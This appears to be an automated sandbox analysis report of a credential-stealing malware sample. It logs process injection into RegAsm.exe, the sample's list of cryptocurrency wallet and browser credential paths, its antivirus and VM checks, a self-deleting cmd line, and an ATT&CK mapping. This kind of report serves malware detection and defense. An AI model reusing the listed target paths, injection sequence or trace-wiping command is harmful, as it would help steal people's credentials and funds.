                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040B463 _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,2_2_0040B463
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004094E5 _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,2_2_004094E5
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040C679 _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,2_2_0040C679
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00415AC2 _EH_prolog,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,2_2_00415AC2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00409F72 _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,2_2_00409F72
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00409900 _EH_prolog,StrCmpCA,FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,2_2_00409900
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040A981 _EH_prolog,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,FindNextFileA,FindClose,2_2_0040A981
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00415E66 _EH_prolog,GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlenA,lstrlenA,2_2_00415E66
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00415843 _EH_prolog,GetLogicalDriveStringsA,memset,GetDriveTypeA,lstrcpy,lstrcpy,lstrcpy,lstrlenA,2_2_00415843
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040FE81 GetSystemInfo,wsprintfA,2_2_0040FE81
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
                  Source: JDGCGD.2.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
                  Source: JDGCGD.2.drBinary or memory string: discord.comVMware20,11696428655f
                  Source: JDGCGD.2.drBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
                  Source: JDGCGD.2.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                  Source: JDGCGD.2.drBinary or memory string: global block list test formVMware20,11696428655
                  Source: JDGCGD.2.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000EC2000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2641871501.0000000000EE3000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2641871501.0000000000E6A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: JDGCGD.2.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                  Source: JDGCGD.2.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                  Source: JDGCGD.2.drBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
                  Source: JDGCGD.2.drBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                  Source: JDGCGD.2.drBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                  Source: JDGCGD.2.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                  Source: JDGCGD.2.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                  Source: JDGCGD.2.drBinary or memory string: outlook.office365.comVMware20,11696428655t
                  Source: JDGCGD.2.drBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                  Source: JDGCGD.2.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                  Source: JDGCGD.2.drBinary or memory string: outlook.office.comVMware20,11696428655s
                  Source: JDGCGD.2.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                  Source: JDGCGD.2.drBinary or memory string: ms.portal.azure.comVMware20,11696428655
                  Source: JDGCGD.2.drBinary or memory string: AMC password management pageVMware20,11696428655
                  Source: JDGCGD.2.drBinary or memory string: tasks.office.comVMware20,11696428655o
                  Source: JDGCGD.2.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                  Source: JDGCGD.2.drBinary or memory string: turbotax.intuit.comVMware20,11696428655t
                  Source: JDGCGD.2.drBinary or memory string: interactivebrokers.comVMware20,11696428655
                  Source: JDGCGD.2.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                  Source: JDGCGD.2.drBinary or memory string: dev.azure.comVMware20,11696428655j
                  Source: JDGCGD.2.drBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
                  Source: RegAsm.exe, 00000002.00000002.2641787959.0000000000D45000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                  Source: JDGCGD.2.drBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
                  Source: JDGCGD.2.drBinary or memory string: bankofamerica.comVMware20,11696428655x
                  Source: JDGCGD.2.drBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                  Source: JDGCGD.2.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeAPI call chain: ExitProcess graph end nodegraph_2-69769
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information queried: ProcessInformation
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00ABA293 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00ABA293
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00417645 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,2_2_00417645
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AC1335 mov eax, dword ptr fs:[00000030h]0_2_00AC1335
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00ABE380 mov ecx, dword ptr fs:[00000030h]0_2_00ABE380
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AC1379 mov eax, dword ptr fs:[00000030h]0_2_00AC1379
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AC9290 GetProcessHeap,0_2_00AC9290
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AB623F SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00AB623F
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AB6549 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00AB6549
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AB66A5 SetUnhandledExceptionFilter,0_2_00AB66A5
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0041937F memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_0041937F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0041E438 SetUnhandledExceptionFilter,2_2_0041E438
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0041A8A7 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_0041A8A7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C7EB66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_6C7EB66C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C7EB1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_6C7EB1F7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C99AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_6C99AC62

                  HIPS / PFW / Operating System Protection Evasion

                  Source: Yara matchFile source: Process Memory Space: file.exe PID: 6352, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 1600, type: MEMORYSTR
                  Source: C:\Users\user\Desktop\file.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write
                  Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0149018D CreateProcessA,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,0_2_0149018D
                  Source: C:\Users\user\Desktop\file.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_004111BE _EH_prolog,CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,2_2_004111BE
                  Source: C:\Users\user\Desktop\file.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
                  Source: C:\Users\user\Desktop\file.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
                  Source: C:\Users\user\Desktop\file.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 422000
                  Source: C:\Users\user\Desktop\file.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 42E000
                  Source: C:\Users\user\Desktop\file.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 641000
                  Source: C:\Users\user\Desktop\file.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: BB5008
                  Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\FCGCGDHJEGHJ" & exit
                  Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AB602C cpuid 0_2_00AB602C
                  Source: C:\Users\user\Desktop\file.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_00AC902E
                  Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoW,0_2_00AC1075
                  Source: C:\Users\user\Desktop\file.exeCode function: EnumSystemLocalesW,0_2_00AC89B7
                  Source: C:\Users\user\Desktop\file.exeCode function: EnumSystemLocalesW,0_2_00AC896C
                  Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,0_2_00AC8ADD
                  Source: C:\Users\user\Desktop\file.exeCode function: EnumSystemLocalesW,0_2_00AC8A52
                  Source: C:\Users\user\Desktop\file.exeCode function: EnumSystemLocalesW,0_2_00AC0B0F
                  Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoW,0_2_00AC8D30
                  Source: C:\Users\user\Desktop\file.exeCode function: GetACP,IsValidCodePage,GetLocaleInfoW,0_2_00AC86CA
                  Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_00AC8E59
                  Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoW,0_2_00AC8F5F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: _EH_prolog,GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,2_2_0040FCE5
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\ VolumeInformation
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AB643C GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00AB643C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040FBCB GetProcessHeap,HeapAlloc,GetUserNameA,2_2_0040FBCB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040FC92 GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA,2_2_0040FC92
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

                  Stealing of Sensitive Information

                  Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                  Source: Yara matchFile source: 2.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.file.exe.ab0000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1950868153.0000000000AD8000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: file.exe PID: 6352, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 1600, type: MEMORYSTR
                  Source: RegAsm.exe, 00000002.00000002.2641871501.0000000000F43000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                  Source: RegAsm.exe, 00000002.00000002.2640792644.0000000000534000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: \ElectronCash\wallets\
                  Source: RegAsm.exe, 00000002.00000002.2640792644.000000000052E000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: \Exodus\exodus.wallet\
                  Source: RegAsm.exe, 00000002.00000002.2640792644.000000000052E000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: info.seco
                  Source: RegAsm.exe, 00000002.00000002.2640792644.000000000052E000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: Exodus
                  Source: RegAsm.exe, 00000002.00000002.2640792644.0000000000534000.00000040.00000400.00020000.00000000.sdmp; String found in binary or memory: \Coinomi\Coinomi\wallets\
                  Source: RegAsm.exe, 00000002.00000002.2640792644.000000000052E000.00000040.00000400.00020000.00000000.sdmp; String found in binary or memory: \Exodus\exodus.wallet\
                  Source: RegAsm.exe, 00000002.00000002.2640792644.0000000000534000.00000040.00000400.00020000.00000000.sdmp; String found in binary or memory: MultiDoge
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: \\config\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.js
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Roaming\Exodus\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Roaming\Exodus\backups\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Roaming\MultiDoge\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Roaming\Binance\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Roaming\Ledger Live\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\
                  Source: Yara match; File source: Process Memory Space: RegAsm.exe PID: 1600, type: MEMORYSTR

                  Remote Access Functionality

                  Source: Yara match; File source: sslproxydump.pcap, type: PCAP
                  Source: Yara match; File source: 2.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match; File source: 2.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match; File source: 0.2.file.exe.ab0000.0.unpack, type: UNPACKEDPE
                  Source: Yara match; File source: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match; File source: 00000000.00000002.1950868153.0000000000AD8000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara match; File source: 00000002.00000002.2641871501.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match; File source: Process Memory Space: file.exe PID: 6352, type: MEMORYSTR
                  Source: Yara match; File source: Process Memory Space: RegAsm.exe PID: 1600, type: MEMORYSTR
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 2_2_6C9A0C40 sqlite3_bind_zeroblob,2_2_6C9A0C40
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 2_2_6C9A0D60 sqlite3_bind_parameter_name,2_2_6C9A0D60
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 2_2_6C8C8EA0 sqlite3_clear_bindings,2_2_6C8C8EA0
                  Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                  Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 1 Windows Management Instrumentation | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Deobfuscate/Decode Files or Information | 2 OS Credential Dumping | 2 System Time Discovery | Remote Services | 1 Archive Collected Data | 2 Ingress Tool Transfer | Exfiltration Over Other Network Medium | Abuse Accessibility Features
                  Credentials | Domains | Default Accounts | 1 Native API | Boot or Logon Initialization Scripts | 511 Process Injection | 2 Obfuscated Files or Information | 1 Credentials in Registry | 1 Account Discovery | Remote Desktop Protocol | 4 Data from Local System | 21 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
                  Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 1 DLL Side-Loading | Security Account Manager | 4 File and Directory Discovery | SMB/Windows Admin Shares | 1 Screen Capture | 3 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
                  Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 Masquerading | NTDS | 55 System Information Discovery | Distributed Component Object Model | Input Capture | 114 Application Layer Protocol | Traffic Duplication | Data Destruction
